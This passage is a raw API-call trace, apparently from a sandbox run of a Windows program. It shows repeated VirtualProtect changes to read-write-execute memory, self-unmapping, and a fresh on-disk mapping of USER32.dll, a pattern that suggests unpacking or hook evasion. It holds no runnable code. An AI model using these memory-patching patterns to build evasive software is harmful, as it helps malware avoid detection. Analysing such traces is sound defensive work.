lpAddress=0x1e8c680, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.911] VirtualProtect (in: lpAddress=0x1e8c680, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.912] VirtualProtect (in: lpAddress=0x1e8c684, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.912] VirtualProtect (in: lpAddress=0x1e8c684, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.912] VirtualProtect (in: lpAddress=0x1e8c68c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.912] VirtualProtect (in: lpAddress=0x1e8c68c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.912] VirtualProtect (in: lpAddress=0x1e8c690, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.912] VirtualProtect (in: lpAddress=0x1e8c690, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.913] VirtualProtect (in: lpAddress=0x1e8c6ac, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.913] VirtualProtect (in: lpAddress=0x1e8c6ac, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.913] VirtualProtect (in: lpAddress=0x1e8c6b0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.913] VirtualProtect (in: lpAddress=0x1e8c6b0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.913] VirtualProtect (in: lpAddress=0x1e8c6cc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.914] VirtualProtect (in: lpAddress=0x1e8c6cc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.914] VirtualProtect (in: lpAddress=0x1e8c6d0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.914] VirtualProtect (in: lpAddress=0x1e8c6d0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.914] VirtualProtect (in: lpAddress=0x1e8c6ec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.914] VirtualProtect (in: lpAddress=0x1e8c6ec, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.914] VirtualProtect (in: lpAddress=0x1e8c6f0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.915] VirtualProtect (in: lpAddress=0x1e8c6f0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.915] VirtualProtect (in: lpAddress=0x1e8c70c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.915] VirtualProtect (in: lpAddress=0x1e8c70c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.915] VirtualProtect (in: lpAddress=0x1e8c710, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.915] VirtualProtect (in: lpAddress=0x1e8c710, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.916] VirtualProtect (in: lpAddress=0x1e8c72c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.916] VirtualProtect (in: lpAddress=0x1e8c72c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.916] VirtualProtect (in: lpAddress=0x1e8c730, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.916] VirtualProtect (in: lpAddress=0x1e8c730, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.916] VirtualProtect (in: lpAddress=0x1e8c74c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.916] VirtualProtect (in: lpAddress=0x1e8c74c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.917] VirtualProtect (in: lpAddress=0x1e8c750, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.917] VirtualProtect (in: lpAddress=0x1e8c750, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0042.917] VirtualProtect (in: lpAddress=0x1e8c76c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0042.917] VirtualProtect (in: lpAddress=0x1e8c76c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.357] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x1e60000) returned 0x0 [0043.361] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0043.362] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0043.362] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0043.362] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0043.363] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0043.363] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77130000 [0043.364] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fc18 | out: DllHandle=0x18fc18*=0x76c20000) returned 0x0 [0043.364] CreateFileW (lpFileName="C:\\Windows\\syswow64\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0043.364] NtCreateSection (in: SectionHandle=0x18fc58, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x1000000, FileHandle=0xac | out: SectionHandle=0x18fc58*=0xb0) returned 0x0 [0043.364] NtMapViewOfSection (in: SectionHandle=0xb0, ProcessHandle=0xffffffff, BaseAddress=0x18fd04*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fc64*=0x100000, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x2 | out: BaseAddress=0x18fd04*=0x1e60000, SectionOffset=0x0, ViewSize=0x18fc64*=0x100000) returned 0x40000003 [0043.365] LdrGetDllHandle (in: DllPath=0x0, DllCharacteristics=0x0, DllName="KERNEL32.DLL", DllHandle=0x18fbc0 | out: DllHandle=0x18fbc0*=0x76c20000) returned 0x0 [0043.365] VirtualProtect (in: lpAddress=0x1e75fc8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.365] VirtualProtect (in: lpAddress=0x1e75fc8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.366] VirtualProtect (in: lpAddress=0x1e75fcc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.366] VirtualProtect (in: lpAddress=0x1e75fcc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.366] VirtualProtect (in: lpAddress=0x1e75fd0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.366] VirtualProtect (in: lpAddress=0x1e75fd0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.367] VirtualProtect (in: lpAddress=0x1e75fd4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.367] VirtualProtect (in: lpAddress=0x1e75fd4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.367] VirtualProtect (in: lpAddress=0x1e75fd8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.367] VirtualProtect (in: lpAddress=0x1e75fd8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.367] VirtualProtect (in: lpAddress=0x1e75fdc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.367] VirtualProtect (in: lpAddress=0x1e75fdc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.368] VirtualProtect (in: lpAddress=0x1e75fe0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.368] VirtualProtect (in: lpAddress=0x1e75fe0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.368] VirtualProtect (in: lpAddress=0x1e75fe4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.368] VirtualProtect (in: lpAddress=0x1e75fe4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.368] VirtualProtect (in: lpAddress=0x1e75fe8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.368] VirtualProtect (in: lpAddress=0x1e75fe8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.369] VirtualProtect (in: lpAddress=0x1e75fec, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.369] VirtualProtect (in: lpAddress=0x1e75fec, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.369] VirtualProtect (in: lpAddress=0x1e75ff0, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.369] VirtualProtect (in: lpAddress=0x1e75ff0, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.369] VirtualProtect (in: lpAddress=0x1e75ff4, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.370] VirtualProtect (in: lpAddress=0x1e75ff4, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.370] VirtualProtect (in: lpAddress=0x1e75ff8, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.370] VirtualProtect (in: lpAddress=0x1e75ff8, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.370] VirtualProtect (in: lpAddress=0x1e75ffc, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.370] VirtualProtect (in: lpAddress=0x1e75ffc, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.370] VirtualProtect (in: lpAddress=0x1e76000, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.371] VirtualProtect (in: lpAddress=0x1e76000, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.371] VirtualProtect (in: lpAddress=0x1e76004, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.371] VirtualProtect (in: lpAddress=0x1e76004, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.371] VirtualProtect (in: lpAddress=0x1e76008, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.371] VirtualProtect (in: lpAddress=0x1e76008, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.372] VirtualProtect (in: lpAddress=0x1e7600c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.372] VirtualProtect (in: lpAddress=0x1e7600c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.372] VirtualProtect (in: lpAddress=0x1e76010, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.372] VirtualProtect (in: lpAddress=0x1e76010, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.372] VirtualProtect (in: lpAddress=0x1e76014, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.372] VirtualProtect (in: lpAddress=0x1e76014, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.373] VirtualProtect (in: lpAddress=0x1e76018, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.373] VirtualProtect (in: lpAddress=0x1e76018, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.373] VirtualProtect (in: lpAddress=0x1e7601c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.373] VirtualProtect (in: lpAddress=0x1e7601c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.373] VirtualProtect (in: lpAddress=0x1e76020, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.374] VirtualProtect (in: lpAddress=0x1e76020, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.374] VirtualProtect (in: lpAddress=0x1e76024, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.374] VirtualProtect (in: lpAddress=0x1e76024, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.374] VirtualProtect (in: lpAddress=0x1e76028, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.374] VirtualProtect (in: lpAddress=0x1e76028, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.374] VirtualProtect (in: lpAddress=0x1e7602c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.375] VirtualProtect (in: lpAddress=0x1e7602c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.375] VirtualProtect (in: lpAddress=0x1e76030, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.375] VirtualProtect (in: lpAddress=0x1e76030, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.375] VirtualProtect (in: lpAddress=0x1e76034, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.375] VirtualProtect (in: lpAddress=0x1e76034, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.375] VirtualProtect (in: lpAddress=0x1e76038, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.376] VirtualProtect (in: lpAddress=0x1e76038, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.376] VirtualProtect (in: lpAddress=0x1e7603c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.376] VirtualProtect (in: lpAddress=0x1e7603c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.376] VirtualProtect (in: lpAddress=0x1e76040, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.376] VirtualProtect (in: lpAddress=0x1e76040, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.376] VirtualProtect (in: lpAddress=0x1e76044, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.377] VirtualProtect (in: lpAddress=0x1e76044, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.377] VirtualProtect (in: lpAddress=0x1e76048, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.377] VirtualProtect (in: lpAddress=0x1e76048, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.377] VirtualProtect (in: lpAddress=0x1e7604c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.377] VirtualProtect (in: lpAddress=0x1e7604c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.378] VirtualProtect (in: lpAddress=0x1e76050, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.378] VirtualProtect (in: lpAddress=0x1e76050, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.378] VirtualProtect (in: lpAddress=0x1e76054, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.378] VirtualProtect (in: lpAddress=0x1e76054, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.378] VirtualProtect (in: lpAddress=0x1e76058, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.378] VirtualProtect (in: lpAddress=0x1e76058, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.379] VirtualProtect (in: lpAddress=0x1e7605c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.379] VirtualProtect (in: lpAddress=0x1e7605c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.379] VirtualProtect (in: lpAddress=0x1e76060, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.379] VirtualProtect (in: lpAddress=0x1e76060, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.379] VirtualProtect (in: lpAddress=0x1e76064, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.380] VirtualProtect (in: lpAddress=0x1e76064, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.380] VirtualProtect (in: lpAddress=0x1e76068, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.380] VirtualProtect (in: lpAddress=0x1e76068, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.380] VirtualProtect (in: lpAddress=0x1e7606c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.380] VirtualProtect (in: lpAddress=0x1e7606c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.381] VirtualProtect (in: lpAddress=0x1e76070, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.381] VirtualProtect (in: lpAddress=0x1e76070, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.381] VirtualProtect (in: lpAddress=0x1e76074, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.381] VirtualProtect (in: lpAddress=0x1e76074, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.381] VirtualProtect (in: lpAddress=0x1e76078, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.381] VirtualProtect (in: lpAddress=0x1e76078, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.382] VirtualProtect (in: lpAddress=0x1e7607c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.382] VirtualProtect (in: lpAddress=0x1e7607c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.382] VirtualProtect (in: lpAddress=0x1e76080, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.382] VirtualProtect (in: lpAddress=0x1e76080, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.382] VirtualProtect (in: lpAddress=0x1e76084, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.382] VirtualProtect (in: lpAddress=0x1e76084, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.383] VirtualProtect (in: lpAddress=0x1e76088, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.383] VirtualProtect (in: lpAddress=0x1e76088, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.383] VirtualProtect (in: lpAddress=0x1e7608c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.383] VirtualProtect (in: lpAddress=0x1e7608c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.383] VirtualProtect (in: lpAddress=0x1e76090, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.383] VirtualProtect (in: lpAddress=0x1e76090, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.384] VirtualProtect (in: lpAddress=0x1e76094, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.384] VirtualProtect (in: lpAddress=0x1e76094, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.384] VirtualProtect (in: lpAddress=0x1e76098, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.384] VirtualProtect (in: lpAddress=0x1e76098, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.384] VirtualProtect (in: lpAddress=0x1e7609c, dwSize=0x4, flNewProtect=0x40, lpflOldProtect=0x18fbf8 | out: lpflOldProtect=0x18fbf8*=0x20) returned 1 [0043.385] VirtualProtect (in: lpAddress=0x1e7609c, dwSize=0x4, flNewProtect=0x20, lpflOldProtect=0x18fbf0 | out: lpflOldProtect=0x18fbf0*=0x40) returned 1 [0043.385] VirtualProtect (in: lpAddress=0x1e760a0, dwSize=0x4, flNewProtect=0x40, 